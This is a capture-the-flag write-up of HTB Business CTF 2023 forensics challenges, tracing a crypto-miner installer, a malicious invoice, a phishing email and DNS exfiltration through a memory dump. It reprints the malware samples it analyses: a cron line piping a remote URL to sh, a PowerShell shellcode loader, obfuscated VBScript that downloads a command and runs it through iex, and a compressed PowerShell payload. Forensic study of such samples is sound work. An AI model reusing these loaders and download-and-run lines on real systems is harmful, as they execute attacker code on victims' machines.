HTB Business CTF 2023: The Great Escape


Red Miners

In the race for Vitalium on Mars, the villainous Board of Arodor resorted to desperate measures, needing funds for their mining attempts. They devised a botnet specifically crafted to mine cryptocurrency covertly. We stumbled upon a sample of Arodor's miner's installer on our server. Recognizing the gravity of the situation, we launched a thorough investigation. With you as its leader, you need to unravel the inner workings of the installation mechanism. The discovery served as a turning point, revealing the extent of Arodor's desperation. However, the battle for Vitalium continued, urging us to remain vigilant and adapt our cyber defences to counter future threats.

Looking at the Bash file, my first thought is to search for HTB since that's typically part of their flag format. One hit is this line:

local url="http://tossacoin.htb/cGFydDI9Il90aDMxcl93NHkiCg=="

Using CyberChef on the base64 portion of the string, we get the following:


We do the same thing with this line:

echo '* * * * * $LDR http://tossacoin.htb/ | sh & echo -n cGFydDE9IkhUQnttMW4xbmciCg==|base64 -d > /dev/null 2>&1'

Which gives us:


Those are the only relevant portions mentioning HTB, so next I looked for more base64 usage and found this:

dest=$(echo "X3QwX200cnN9Cg=="|base64 -d)

Which decodes to the final part of the flag:


Answer: HTB{m1n1ng_th31r_w4y_t0_m4rs}

Scripts and Formulas

After the last site UNZ used to rely on for the majority of Vitalium mining ran dry, the UNZ hired a local geologist to examine possible sites that were used in the past for secondary mining operations. However, after finishing the examinations, and the geologist was ready to hand in his reports, he mysteriously went missing! After months, a mysterious invoice regarding his examinations was brought up to the Department. Being new to the job, the clerk wasn't aware of the past situation and opened the Invoice. Now all of a sudden, the Arodor faction is really close to taking the lead on Vitalium mining! Given some Logs from the Clerk's Computer and the Invoice, pinpoint the intrusion methods used and how the Arodor faction gained access! To get the flag you need to answer the questions from the docker instance.


After spawning the Docker instance and connecting with nc 30317, we get the first question:

  1. What program is being copied, renamed, and what is the final name? (Eg: notepad.exe:picture.jpeg)

I used PowerShell to do this instead of the Windows Event Viewer GUI. After messing around with it for a while, I came up with the following:

$FormatEnumerationLimit = -1
$OutputFile = "./_matching_events.log"
$WindowWidth = $Host.UI.RawUI.BufferSize.Width

# Delete the file if it exists
if (Test-Path -Path $OutputFile) {
    Remove-Item -Path $OutputFile

Get-WinEvent -Path .\* | foreach {
    if ($_.Message -match '(copy|rename)') {
        $EventProperties = @{
            TimeCreated = $_.TimeCreated
            EventID = $_.Id
            Message = $_.Message
            ApplicationName = $_.Properties[0].Value
            FilePath = $_.Properties[1].Value
        $EventProperties | Format-List | Out-String | Out-File -Append -FilePath $OutputFile
        Add-Content -Path $OutputFile -Value ("=" * $WindowWidth)

The output had one bit that was pretty interesting right off the bat for event ID 4104:

Creating Scriptblock text (1 of 1):
function func_get_proc_address {
  Param ($var_module, $var_procedure)		
  $var_unsafe_native_methods = ([AppDomain]::CurrentDomain.GetAssemblies() | Where-Object { 
  $var_gpa = $var_unsafe_native_methods.GetMethod('GetProcAddress', [Type[]] 
  return $var_gpa.Invoke($null, @([System.Runtime.InteropServices.HandleRef](New-Object 

function func_get_delegate_type {
  Param (
    [Parameter(Position = 0, Mandatory = $True)] [Type[]] $var_parameters,
    [Parameter(Position = 1)] [Type] $var_return_type = [Void]

  $var_type_builder = [AppDomain]::CurrentDomain.DefineDynamicAssembly((New-Object 
  $var_type_builder.DefineConstructor('RTSpecialName, HideBySig, Public', 
  $var_type_builder.DefineMethod('Invoke', 'Public, HideBySig, NewSlot, Virtual', $var_return_type, 

  return $var_type_builder.CreateType()

[Byte[]]$var_code = [System.Convert]::FromBase64String('32ugx9PL7yMjI2JyYnNxcnVrEvFGa6hxQ2uocTtrqHEDa6hR

for ($x = 0; $x -lt $var_code.Count; $x++) {
  $var_code[$x] = $var_code[$x] -bxor 35

$var_va = 
$var_buffer = $var_va.Invoke([IntPtr]::Zero, $var_code.Length, 0x3000, 0x40)
[System.Runtime.InteropServices.Marshal]::Copy($var_code, 0, $var_buffer, $var_code.length)

$var_runme = [System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($var_buffer, 

ScriptBlock ID: a161d800-a564-40a3-aad8-4f9e02e966f7

There were a lot of irrelevant (to this question) firewall changes being made in the logs, so I changed the if statement to reduce them down to make it easier to manually parse over:

if ($_.Message -match '(copy|rename)' -and $_.Message -notmatch 'Windows Defender Firewall')

I was able to deobfuscate the VBScript code somewhat to get the following:

Function ZbVxxAHCsiTnKpIJ()
    Dim yNSlalZeGAsokjsP
    Dim pJmLeYiULjageWIP
    Dim cMtARTHTmbqbxauA 
    Dim bZzPBAGNtCswuUoo
    Dim QlAtSUbRwRFNlEjX

    Dim objShell
    Set objShell = WScript.CreateObject("WScript.Shell")

    yNSlalZeGAsokjsP = LLdunAaXwVgKfowf("BcV:L\XwFiInDdDoXw7s1\9sNy4sIt9eGm") & "32" & LLdunAaXwVgKfowf("V312I\OwFiPnDdJo0wVsDp7oFw7e6r5sBhCeTl1lB\Ev81IU04") & "1.0" & LLdunAaXwVgKfowf("\9pMoBw7eTrMsDhKeVlOl1.WeMxUe")
    cMtARTHTmbqbxauA = yNSlalZeGAsokjsP & " " & LLdunAaXwVgKfowf("EK-MMe4RpHW JIb9FyG7pSZaQ6s56sYB IN-4XwMT OThL2i64dSGdEXe0CnNE 9Q-X6c4V ") & Chr(34) & LLdunAaXwVgKfowf("M0F$BWQuEKRrCBAlAY9 1JQ=65V QTL[KTCsEMKyRE4sTJ3tMY0eQAVmF9E.60Qt7KEeZTUxXD6t0LC.CF9eXAWn5HDcGMSoZOFdT2KiCQ3n0KNgFUN]5YP:3PY:BLLaQ2VsZMUcJAYi4MXiKCX.4I8gY2Ae0YItJYKsU8MtLZ9rMUZiM95nJH4gTDX(HZP[H4RsWZ7yOCKsMX2tNWIe02ZmOH8.BCVcE9SoAXHnP9QvDXJe3CJrD51t2LE]C2L:0M2:I66f616rSKCoFKXmMKAb3X9aGMSsWO4e") & "64" & LLdunAaXwVgKfowf("E1sFUtLBrDIiTXn9NgZG(ED'88") & "aHR0cHM6Ly9zaGVldHMuZ29vZ2xlYXBpcy5jb20vdjQvc3ByZWFkc2hlZXRzLzFIcEI0R3FxWXdJNlg3MXo0cDJFSzg4Rm9KanJzVzJES2JTa3gtcm81bFFRP2tleT1BSXphU3lEVXBqU2Y3UjFsMWRRb2hBNVF2OUVkeVdBM0tCT01jMFUmcmFuZ2VzPVNoZWV0MSFPMzcmaW5jbHVkZUdyaWREYXRhPXRydWU=" & LLdunAaXwVgKfowf("ECK5'1Y)44)UQ;2F$B7rNGe7AsNGpMV J2=QG XBi1BnYNv8So3XkNKe70-CGrO6e54sU8tZ9m6Le6FtI8hX1oTJdXF DD-LGuXMrUKiLC AA$CVuEBrBJl") & LLdunAaXwVgKfowf(";VQI$WN2pV0XaRDAyTQDlB8RoMOWaMQ9d71C I1G=XC1 JBM$XOFrSGBeL3Qs7HNp9ZG.DH0sOC1hQ15e8VNePHVtZ8RsMS5[") & "0" & LLdunAaXwVgKfowf("7010HGS]F6H.JTWdB0Na3CHtT27aW5W[") & "0" & LLdunAaXwVgKfowf("7Z10CS0]V4E.9H0rRO1oHJEw") & "D" & LLdunAaXwVgKfowf("YP7aQTYtE3UaYLX[") & "0" & LLdunAaXwVgKfowf("OPI0J12]JUK.TK7v7J0aRTGl9B2uFO7eV11sOEC[") & "0" & LLdunAaXwVgKfowf("VKB0X4U]VO2.ZMIf4FIoD02r82Mm5NNaNIVt2Z4tH3JeYWLd") & "V" & LLdunAaXwVgKfowf("F2aESlKEuR0e5Y;R4$UAdZIeBIcL5o51dPXeEW CK=4Q LS[M8sYHyE3s82t6YeAXmB2.12cXZo2PnZKvYEeOWrK9tQN]YQ:QQ:RZfK6rJIoQVmRRbBUa6RsHOeUZ") & "64" & LLdunAaXwVgKfowf("6934MPsZAt50rIFiUYn6Sg46(HG$JFpE7aNAyVHlL9oH0aQNdUX)VA;XK$YEmM4s59 87=PT FHnETe61wYM-SYo5Bb6VjHPe3DcHQtET 7SsQ0yIKs6Pt71eBTmJQ.7GiI5oT4.SDmUQeVDmAMoRZrUGyGAsG1tK7rM9ePMaUQmTT;YF$Z1mWTsIZ.5Ww4CrBZi1CtCNeTU(W0$0LdFXe2HcDDoBAd3HeXL,") & "0" & LLdunAaXwVgKfowf("Q8Z,409 12M$S2Zd5JAeVHYc6DNoEOCdEZZeOVB.9RYlTD3eP6HnB29g1VYtHC2hHIN)FND;20Z$KJ5mJZYsFHJ.I28p0VYo48Gs1V9i91DtEPNiLLUoP49n000 DC8=F7S") & "0" & LLdunAaXwVgKfowf("1;2$Fs1rV C=W Dn8e7wB-YoMbAjXeIc4tY SsFyAsItQeNmI.8iQoY.WsGt2rBe5aDm3rReEaBdPeArR(1nCe1wI-RoPbMjNeDcWt6 BsJy7sNt2eEm5.SiZoQ.JcKoMmYp8rWeDs6sZiWoRn0.TdPe8f6lIaYtJeXsBt2rDeHaNmF(3$NmRsO,7 M[AsQyPsKt9e7mR.Hi5oD.WcEoNmDp5rRe8sMsBi4oMn1.8cLoSmQpPrHeIsCsJi2oMnEmHo5dCeA]6:X:IdEeMcRoQmLpGr1eIs4sY)T)F;A$Md7aDtXaM F=B W$OsBrH.CrWeWaVdKtXo2eAnAd1(P)E;K$Gs7r2.2cYlZoVsEeM(O)0;I$Tm0sB.YcHlNoXs6eO(P)0;IWP$TIVd5MUaSLGtSPXa") & "|iex" & Chr(34)
    objShell.Run cMtARTHTmbqbxauA

Function LLdunAaXwVgKfowf(t)
    Dim msStr()
    ReDim msStr(Len(t))
    Dim jKaNZCemSwPDrmLT
    jKaNZCemSwPDrmLT = ""
    For i = 1 To UBound(msStr)
        msStr(i) = Mid(t, i, 1)
    For Each qqEPRvFjIuMSmDvM In msStr
        If qqEPRvFjIuMSmDvM = LCase(qqEPRvFjIuMSmDvM) And Not IsNumeric(qqEPRvFjIuMSmDvM) Then jKaNZCemSwPDrmLT = jKaNZCemSwPDrmLT + qqEPRvFjIuMSmDvM
    LLdunAaXwVgKfowf = jKaNZCemSwPDrmLT
  End Function
  Sub Main()
  End Sub

Function ZbVxxAHCsiTnKpIJ()
    Dim yNSlalZeGAsokjsP
    Dim pJmLeYiULjageWIP
    Dim cMtARTHTmbqbxauA
    Dim bZzPBAGNtCswuUoo
    Dim QlAtSUbRwRFNlEjX

    Dim objShell
    Set objShell = WScript.CreateObject("WScript.Shell")

    yNSlalZeGAsokjsP = GetURL("")
    cMtARTHTmbqbxauA = yNSlalZeGAsokjsP & " " & GetString("EK-MMe4RpHW JIb9FyG7pSZaQ6s56sYB IN-4XwMT OThL2i64dSGdEXe0CnNE 9Q-X6c4V ") & Chr(34) & GetString("M0F$BWQuEKRrCBAlAY9 1JQ=65V QTL[KTCsEMKyRE4sTJ3tMY0eQAVmF9E.60Qt7KEeZTUxXD6t0LC.CF9eXAWn5HDcGMSoZOFdT2KiCQ3n0KNgFUN]5YP:3PY:BLLaQ2VsZMUcJAYi4MXiKCX.4I8gY2Ae0YItJYKsU8MtLZ9rMUZiM95nJH4gTDX(HZP[H4RsWZ7yOCKsMX2tNWIe02ZmOH8.BCVcE9SoAXHnP9QvDXJe3CJrD51t2LE]C2L:0M2:I66f616rSKCoFKXmMKAb3X9aGMSsWO4e") & "64" & GetString("E1sFUtLBrDIiTXn9NgZG(ED'88") & "aHR0cHM6Ly9zaGVldHMuZ29vZ2xlYXBpcy5jb20vdjQvc3ByZWFkc2hlZXRzLzFIcEI0R3FxWXdJNlg3MXo0cDJFSzg4Rm9KanJzVzJES2JTa3gtcm81bFFRP2tleT1BSXphU3lEVXBqU2Y3UjFsMWRRb2hBNVF2OUVkeVdBM0tCT01jMFUmcmFuZ2VzPVNoZWV0MSFPMzcmaW5jbHVkZUdyaWREYXRhPXRydWU=") & GetString("ECK5'1Y)44)UQ;2F$B7rNGe7AsNGpMV J2=QG XBi1BnYNv8So3XkNKe70-CGrO6e54sU8tZ9m6Le6FtI8hX1oTJdXF DD-LGuXMrUKiLC AA$CVuEBrBJl") & GetString(";VQI$WN2pV0XaRDAyTQDlB8RoMOWaMQ9d71C I1G=XC1 JBM$XOFrSGBeL3Qs7HNp9ZG.DH0sOC1hQ15e8VNePHVtZ8RsMS5[") & "0" & GetString("7010HGS]F6H.JTWdB0Na3CHtT27aW5W[") & "0" & GetString("7Z10CS0]V4E.9H0rRO1oHJEw") & "D" & GetString("YP7aQTYtE3UaYLX[") & "0" & GetString("OPI0J12]JUK.TK7v7J0aRTGl9B2uFO7eV11sOEC[") & "0" & GetString("VKB0X4U]VO2.ZMIf4FIoD02r82Mm5NNaNIVt2Z4tH3JeYWLd") & "V" & GetString("F2aESlKEuR0e5Y;R4$UAdZIeBIcL5o51dPXeEW CK=4Q LS[M8sYHyE3s82t6YeAXmB2.12cXZo2PnZKvYEeOWrK9tQN]YQ:QQ:RZfK6rJIoQVmRRbBUa6RsHOeUZ") & "64" & GetString("6934MPsZAt50rIFiUYn6Sg46(HG$JFpE7aNAyVHlL9oH0aQNdUX)VA;XK$YEmM4s59 87=PT FHnETe61wYM-SYo5Bb6VjHPe3DcHQtET 7SsQ0yIKs6Pt71eBTmJQ.7GiI5oT4.SDmUQeVDmAMoRZrUGyGAsG1tK7rM9ePMaUQmTT;YF$Z1mWTsIZ.5Ww4CrBZi1CtCNeTU(W0$0LdFXe2HcDDoBAd3HeXL,") & "0" & GetString("Q8Z,409 12M$S2Zd5JAeVHYc6DNoEOCdEZZeOVB.9RYlTD3eP6HnB29g1VYtHC2hHIN)FND;20Z$KJ5mJZYsFHJ.I28p0VYo48Gs1V9i91DtEPNiLLUoP49n000 DC8=F7S") & "0" & GetString("1;2$Fs1rV C=W Dn8e7wB-YoMbAjXeIc4tY SsFyAsItQeNmI.8iQoY.WsGt2rBe5aDm3rReEaBdPeArR(1nCe1wI-RoPbMjNeDcWt6 BsJy7sNt2eEm5.SiZoQ.JcKoMmYp8rWeDs6sZiWoRn0.TdPe8f6lIaYtJeXsBt2rDeHaNmF(3$NmRsO,7 M[AsQyPsKt9e7mR.Hi5oD.WcEoNmDp5rRe8sMsBi4oMn1.8cLoSmQpPrHeIsCsJi2oMnEmHo5dCeA]6:X:IdEeMcRoQmLpGr1eIs4sY)T)F;A$Md7aDtXaM F=B W$OsBrH.CrWeWaVdKtXo2eAnAd1(P)E;K$Gs7r2.2cYlZoVsEeM(O)0;I$Tm0sB.YcHlNoXs6eO(P)0;IWP$TIVd5MUaSLGtSPXa") & "|iex" & Chr(34)
    objShell.Run cMtARTHTmbqbxauA
End Function

Function GetURL(t)
    Dim msStr()
    ReDim msStr(Len(t))
    Dim jKaNZCemSwPDrmLT
    jKaNZCemSwPDrmLT = ""
    For i = 1 To UBound(msStr)
        msStr(i) = Mid(t, i, 1)
    For Each qqEPRvFjIuMSmDvM In msStr
        If qqEPRvFjIuMSmDvM = LCase(qqEPRvFjIuMSmDvM) And Not IsNumeric(qqEPRvFjIuMSmDvM) Then jKaNZCemSwPDrmLT = jKaNZCemSwPDrmLT + qqEPRvFjIuMSmDvM
    GetURL = jKaNZCemSwPDrmLT
End Function

Sub Main()
End Sub

Function ZbVxxAHCsiTnKpIJ()
    Dim scriptURL
    Dim command
    Dim shellCommand
    Dim shell

    Set shell = CreateObject("WScript.Shell")

    scriptURL = ""
    command = GetURL(scriptURL)
    shellCommand = command & "|iex"
    shell.Run shellCommand
End Function

Function GetURL(url)
    Dim modifiedURL
    Dim i

    modifiedURL = ""
    For i = 1 To Len(url)
        If IsAlphaNumeric(Mid(url, i, 1)) Then
            modifiedURL = modifiedURL & Mid(url, i, 1)
        End If

    GetURL = modifiedURL
End Function

Function IsAlphaNumeric(character)
    Dim asciiValue
    asciiValue = Asc(character)

    If (asciiValue >= 48 And asciiValue <= 57) Or _
        (asciiValue >= 65 And asciiValue <= 90) Or _
        (asciiValue >= 97 And asciiValue <= 122) Then
        IsAlphaNumeric = True
        IsAlphaNumeric = False
    End If
End Function



This email seems to have come from one of our agents, Axel Knight, but Axel has been missing for weeks, and we believe him to be compromised. The email claims to have information that could be vital to our winning this war, but before we use it, we want to make sure it is safe to open. Analyze the given email and see if it's real, or if it's just the Arodorians trying to phish us, and find the flag.


After opening the EML file with Outlook, we can see that there is an attached HTML file, [TOP SECRET] Arodorian Hypercraft.pdf.html. I opened the file in a browser and it automatically downloaded [TOP SECRET]Hypercraft The ZIP file contained a JavaScript file, [TOP SECRET] Arodorian Hypercraft.pdf.js.

Decoded PowerShell command from JavaScript:

powershell -execution bypass "iex(New-Object System.IO.Compression.DeflateStream( [System.IO.MemoryStream] [convert]::FromBase64String('jVf7b+JIEv59/ooW4tagBI53HquTzkkYQjaQBEwgMzdSN9AQT4whtgkwHP/71lcd25m9G90haOzuqq9eD5dFv+kU2lGzI3KZRzvIHGXaipYL+nn6vPajlMkLkfvq7FbNb7nMvnLYVw/78mFfOmREYWYtp67fso6tovYv6S986jvNRdGhS72NLGKl7+9CiPBNiPb8M0EJkYAxjIFksDv/URNn/yl0mp3ihC4D+jkxTPgocla9+WgdWV6fNnNfo91KvwMRCqv0WVhNYmovodSsfWvljQa/EVmNNSf9WWqmMBNW4ELVqEDrJOospyw/wkICCo86CN2lLyqfZmt/EuFy8DSR21eRy+6drlzow3F2f/n8IudL2V57h7zYfyJrxWwZgESvF9LrbGV3N5gfxD9E6XeBTbm4lZ1t92lNmwUvoj1HdjvNQzEzkXcDP8qArLmWnVvD2zocHcXI9InJvxLWoEMC5MjfrVuHbySBhEayu3g/XMjbBSFIc1oYb0mt7H4ir/9oLaU7IH0Z88BroKN14CNC82ZUeFO9tj32NKVFjXLhC+dB4VHd5s/PM3YoL103U8zMm04oHdlr+/MMRHdlRxPoIfVXbyKv7EheqhtH7N9F5MrFYrkh/i2KOetvVn4vrH3pfHSwKAdEDoEyWVHmrBBWC0FR/nS5oP+o0ENkOmoryo28II8Xvi9dX1jW4RM5TcIhCznq7uSg9ePH3R3cHmPGgIMdcnX7yjnU34WRXhQvdpH++u2b+GeutC2p49K23EiWCi31U1pq03gpl+PTEm5LGssJlknMYfaqyR44arhK4UulBM9cUbKenebJkHD9IB/C9txj/YtxsRj9L0n1Y7LiV/pXIaoKUdUGIZ6WgDiSodz6aiUfm4lPDCZV3jvg5a8QazCoDFtO2AXA5uUEbqnzXnJl6GBQHVf1WXxQx545hYb1enxag6uYuMbEzAYvMShzNMYJRxIOw4EDZjN00Co9qJ/F8A1GrsV7rMu7QuSjBvnot5w1mZIHyFd9qhqbXKWRVJNdTz6N5Ob5tfMxGnHHoYCgYfTQQq5s59K+oZ5zxFQm5/6flGsgd6pQsQK1q4p0OqkiblS93dZ/y4IpAa42JCuRhKbGR86yH6F1orn5cytfbPtvyxedy4sjYf3LopWtehpt5LUkq0jMcLzpyLl8uEhEcQWa/BDWDUwk22AoWYmuemTIzOMgcYahtPEEiKmJmASs5U1vCPDsB9ewtpvnpSLKhWsIm4PO7WIkqT22+nJoj6V317z/iwNIzu69Cn7lUc44k63ImmpSupzLjST8TFeF+zlNTpAhHA3Ob864D9nKic/phPQ0KEi2Kk4bSMoGCptP67g6ATGnZ41LnPEgowYZTFdjKOZlEhae8rLOOKiyalwbbFGiM/OaCmOdWQPeYzbcGtvYhLTWIJdBjX4JnkHhJsK8oGNPNlIf4MDwsuLcHdkOrrpExgk3CUZmAF5YGhb2MyNzy6qzS1Kf4ortNbzsK/ZLEkHWjxuC0Y+riM2H3DQeNdYl7TyJlSmd8TMDpLHkns0eZ5FpPFgr3LLiJl94j3XhoCS2cczZ8lQGR8vEMslTox+jsCPYB+hV1TMqt1r+dyqOQDZ742HUe0NBiKw7n52fm6qIxxqacrhiVagbNSqQzwE/N6khuD79X9DvQ0cw44gnOzRCyME8HEr7wpN3zRWPBrk5jUaPKnDt8S1NAu/D1y1mI8wCNAr8pRVaVIAhSdjwXBVp5Xnjj8KomfktzEw93ZMXG+n0Hg9slwrlyw+5upaDlf09Kfa4f1orYFJv/rnX0UHS6WDbf3Y6Qn57WMn+xUjOdwYXz73EV3ELoiZ1HHcu07ZML1JSRz0ZTuUs4U3aIjNSCyLuLdbB069a0RnCeYrCOEOcFcpmjOhqFIHCgUIeniKlx7wg7OaW6UByikTWoFOMknLg4Ax5yLeMN4ZIZuNbPtBIS1WhXKpU+NESyZfXgIbR/uz+CvZZGTwafpoMxP8cDSrI+AqXQvKc5tTlAzOFwBpzwG2DiVFfzFYxp3jg1RG2TJYGV5pb8QD48mV5lw3Xr699t3X79yzFMhyPWrvv+QziS+qSFbr3ICccn3fFacynADc4wPX4ceGo8MXmkZTM6epNoU//HiZL/CbPtOCBOl1jumySn9eRJlVU/48vq+v1vfqeneyCp9GQhgCKvB3M1wvt8+j+Ih9kb+GF8vPqCk/SaNW9urmXG2krKPVxWoBqpBdpV2elIDXWBa87ego1702latKFtt2V8qAq6ZXJDm6CTQZ52V7P5FTuhioMYiHm7YYMNqLe36nc+RwGkozJM8/R4YuDgsGvi43p2iOxsPrOn2gyLfo4L5v5OyqgPlSkUYH2dHqldmGuTCw9vdKRC6+2/UgHb8pL0iftCSsV+9xxF/yCBWnAED9jXK0DxS8NH0YsLlX4KsXArKDhspWKgXLVRp0Ldio3kWMPX7exV8gf5BgyhvxuumQ8JLHZ9Mr6Aqgocv152NdoAam/OALsJZZ07U6n2qeXj7UXuStPt/0wUuS0kF6Sfmoo1r2CfzUCRy0QvLbnLTf9SAVRe3bnX6iI3OXq8FM6aZFqJj0IidOD5jiAzF10VIyXxIIX1TSScfggAJnTVQtNKTkcDxeY5cb0emlyHu+TgXxFmRScADmBF0G7LQeURk80ZfUpjQpkPruBjqZD6Rg//gk='), [System.IO.Compression.CompressionMode]::DECOMPReSS) | ForEach{New-Object IO.StreamReader( $_, [System.Text.Encoding]::Ascii ) } ).readToEnd( )"

Project Redline

In the aftermath of a mysterious death in the United Nations of Zenium colony on Mars, during the Autopsy, the doctor uncovers a peculiar secret. Traces of a cyber attack are discovered on the victim's cybernetic implants, pointing to a covert infiltration by the Board of Arodor. Determined to reveal the truth, the doctor joins forces with a cyber forensics expert, tracing the attack's origins. As they delve deeper, they uncover a startling revelation. In the implant factory, a worker examined what they thought was leaked footage from Arodors cyber implant research. Unbeknownst to him, the intel was infected with malware, infecting the whole production line. Now, they must race against time to expose cybercriminals and prevent Mars's fragile peace from shattering again.


This one is a bit of a bigger lift to parse through initially, as there are 16475 recorded packets in the capture. Luckily, 16338 (99.2%) are DNS, so we know that's likely how we're going to find the flag. Out of curiosity, I filtered for not dns to see what else there was, and it was all MDNS queries to a linked iPhone. There are a massive number of queries for A records, which is typically indicative of DNS exfil, so I decided to start there.

The site requested was pretending to be a Microsoft domain (, but some research indicated that it was "malicious" for the purposes of this challenge. The domain was registered exclusively for the 2023 competition, and visiting the root domain redirects to a [Rick Roll]( Attempting to compare the domains being requested over time shows some similarities:
  • The first subdomain, i.e. 6M3iCMhHvXoC8oNGbnbtTJbVfKLsF4nMFqstYU4UowoC8Y5LHJ6TxA95PbBfQ64, is always 64 characters long.
  • The first subdomain also only varies slowly over time, i.e. packet 6135 has the same first 7 characters as packet 1173. This makes me believe that it may be a form of encoded timestamp.
  • The first 3 subdomains are always 64 characters long, and the 4th is always 17 characters.

We also have memory.raw, which is a 2GB memory dump. I decided to give Volatility 3 a spin to see if we can find anything that will tell us how to decipher the DNS communications:

python3 -m pip install -U distorm3 yara pycrypto pillow openpyxl ujson pytz ipython capstone 2>/dev/null
git clone
cd volatility3
# rm -rf ~/.cache/volatility3/data_*.cache
python3 -f /mnt/d/Programming/bits-and-bobbles/notes/assets/hackthebox/HTB-Business-CTF-2023/forensics_project_redline/memory.raw windows.pslist.PsList

We can see that the following programs were running:

PID     PPID    ImageFileName   Offset(V)       Threads Handles SessionId       Wow64   CreateTime      ExitTime        File output

4       0       System  0xad81e4479040  152     -       N/A     False   2023-06-13 22:32:27.000000      N/A     Disabled
124     4       Registry        0xad81e45d0040  4       -       N/A     False   2023-06-13 22:32:23.000000      N/A     Disabled
408     4       smss.exe        0xad81e889e040  2       -       N/A     False   2023-06-13 22:32:27.000000      N/A     Disabled
516     504     csrss.exe       0xad81e860c080  11      -       0       False   2023-06-13 22:32:31.000000      N/A     Disabled
592     504     wininit.exe     0xad81ead2a080  2       -       0       False   2023-06-13 22:32:31.000000      N/A     Disabled
616     584     csrss.exe       0xad81ead340c0  12      -       1       False   2023-06-13 22:32:31.000000      N/A     Disabled
696     584     winlogon.exe    0xad81ead66080  5       -       1       False   2023-06-13 22:32:31.000000      N/A     Disabled
740     592     services.exe    0xad81ead23080  6       -       0       False   2023-06-13 22:32:31.000000      N/A     Disabled
748     592     lsass.exe       0xad81ead81300  9       -       0       False   2023-06-13 22:32:31.000000      N/A     Disabled
880     740     svchost.exe     0xad81eade9240  18      -       0       False   2023-06-13 22:32:31.000000      N/A     Disabled
908     696     fontdrvhost.ex  0xad81eae1c140  5       -       1       False   2023-06-13 22:32:31.000000      N/A     Disabled
916     592     fontdrvhost.ex  0xad81eae1a140  5       -       0       False   2023-06-13 22:32:31.000000      N/A     Disabled
1004    740     svchost.exe     0xad81eaeab2c0  9       -       0       False   2023-06-13 22:32:31.000000      N/A     Disabled
504     696     dwm.exe 0xad81eaf0a080  22      -       1       False   2023-06-13 22:32:31.000000      N/A     Disabled
1028    740     svchost.exe     0xad81eaf68240  57      -       0       False   2023-06-13 22:32:31.000000      N/A     Disabled
1168    740     upfc.exe        0xad81eafc0080  1       -       0       False   2023-06-13 22:32:31.000000      N/A     Disabled
1212    740     svchost.exe     0xad81eafcc2c0  16      -       0       False   2023-06-13 22:32:31.000000      N/A     Disabled
1220    740     svchost.exe     0xad81eafd92c0  8       -       0       False   2023-06-13 22:32:31.000000      N/A     Disabled
1240    740     svchost.exe     0xad81eafdc2c0  13      -       0       False   2023-06-13 22:32:31.000000      N/A     Disabled
1428    740     VBoxService.ex  0xad81ebc7a240  11      -       0       False   2023-06-13 22:32:31.000000      N/A     Disabled
1592    740     svchost.exe     0xad81ebcee280  16      -       0       False   2023-06-13 12:32:33.000000      N/A     Disabled
1684    4       MemCompression  0xad81ebd0e040  42      -       N/A     False   2023-06-13 12:32:33.000000      N/A     Disabled
1816    740     svchost.exe     0xad81ebdee0c0  11      -       0       False   2023-06-13 12:32:33.000000      N/A     Disabled
1892    740     svchost.exe     0xad81ebd0b080  4       -       0       False   2023-06-13 12:32:33.000000      N/A     Disabled
1924    740     svchost.exe     0xad81ebdf62c0  4       -       0       False   2023-06-13 12:32:33.000000      N/A     Disabled
1916    740     svchost.exe     0xad81ebdf22c0  16      -       0       False   2023-06-13 12:32:33.000000      N/A     Disabled
1932    740     svchost.exe     0xad81ebdf42c0  3       -       0       False   2023-06-13 12:32:33.000000      N/A     Disabled
1652    740     spoolsv.exe     0xad81ebdfa0c0  8       -       0       False   2023-06-13 12:32:33.000000      N/A     Disabled
2052    740     svchost.exe     0xad81ebe970c0  13      -       0       False   2023-06-13 12:32:33.000000      N/A     Disabled
2232    740     svchost.exe     0xad81ebea2080  12      -       0       False   2023-06-13 12:32:33.000000      N/A     Disabled
2256    740     MsMpEng.exe     0xad81ebf92340  12      -       0       False   2023-06-13 12:32:33.000000      N/A     Disabled
2620    1028    taskhostw.exe   0xad81ec0b02c0  6       -       0       False   2023-06-13 12:32:34.000000      N/A     Disabled
2788    740     svchost.exe     0xad81ec12a240  24      -       0       False   2023-06-13 12:32:34.000000      N/A     Disabled
2976    2620    ngentask.exe    0xad81ec1d6300  5       -       0       True    2023-06-13 12:32:34.000000      N/A     Disabled
2992    2620    ngentask.exe    0xad81ec1e1340  12      -       0       False   2023-06-13 12:32:34.000000      N/A     Disabled
3000    2992    conhost.exe     0xad81ec1e2080  4       -       0       False   2023-06-13 12:32:34.000000      N/A     Disabled
3032    2976    conhost.exe     0xad81ec1ef200  4       -       0       False   2023-06-13 12:32:34.000000      N/A     Disabled
2784    740     svchost.exe     0xad81ec2f3080  6       -       0       False   2023-06-13 12:32:35.000000      N/A     Disabled
788     2976    ngen.exe        0xad81ec3e3080  6       -       0       True    2023-06-13 12:32:35.000000      N/A     Disabled
3424    740     TrustedInstall  0xad81ec4d0080  3       -       0       False   2023-06-13 12:32:37.000000      N/A     Disabled
3468    880     TiWorker.exe    0xad81eac45080  2       -       0       False   2023-06-13 12:32:38.000000      N/A     Disabled
3924    740     svchost.exe     0xad81ec6782c0  7       -       1       False   2023-06-13 12:32:43.000000      N/A     Disabled
3932    1028    sihost.exe      0xad81ec679080  12      -       1       False   2023-06-13 12:32:43.000000      N/A     Disabled
3184    1028    taskhostw.exe   0xad81ec75d080  10      -       1       False   2023-06-13 12:32:44.000000      N/A     Disabled
3132    1592    ctfmon.exe      0xad81ec754240  12      -       1       False   2023-06-13 12:32:44.000000      N/A     Disabled
3420    696     userinit.exe    0xad81ec59d300  0       -       1       False   2023-06-13 12:32:46.000000      2023-06-13 12:33:15.000000      Disabled
2952    3420    explorer.exe    0xad81ebd3b300  65      -       1       False   2023-06-13 12:32:46.000000      N/A     Disabled
3316    740     svchost.exe     0xad81ebd3a080  3       -       1       False   2023-06-13 12:32:48.000000      N/A     Disabled
4104    740     svchost.exe     0xad81ecaa2080  3       -       0       False   2023-06-13 12:32:50.000000      N/A     Disabled
4172    740     SearchIndexer.  0xad81ec4cf080  16      -       0       False   2023-06-13 12:32:53.000000      N/A     Disabled
4328    880     StartMenuExper  0xad81ec5bb080  6       -       1       False   2023-06-13 12:32:54.000000      N/A     Disabled
4484    880     RuntimeBroker.  0xad81ecdce2c0  13      -       1       False   2023-06-13 12:32:55.000000      N/A     Disabled
4608    880     SearchApp.exe   0xad81ecdcd080  32      -       1       False   2023-06-13 12:32:55.000000      N/A     Disabled
4800    880     RuntimeBroker.  0xad81ed0ec2c0  6       -       1       False   2023-06-13 12:32:55.000000      N/A     Disabled
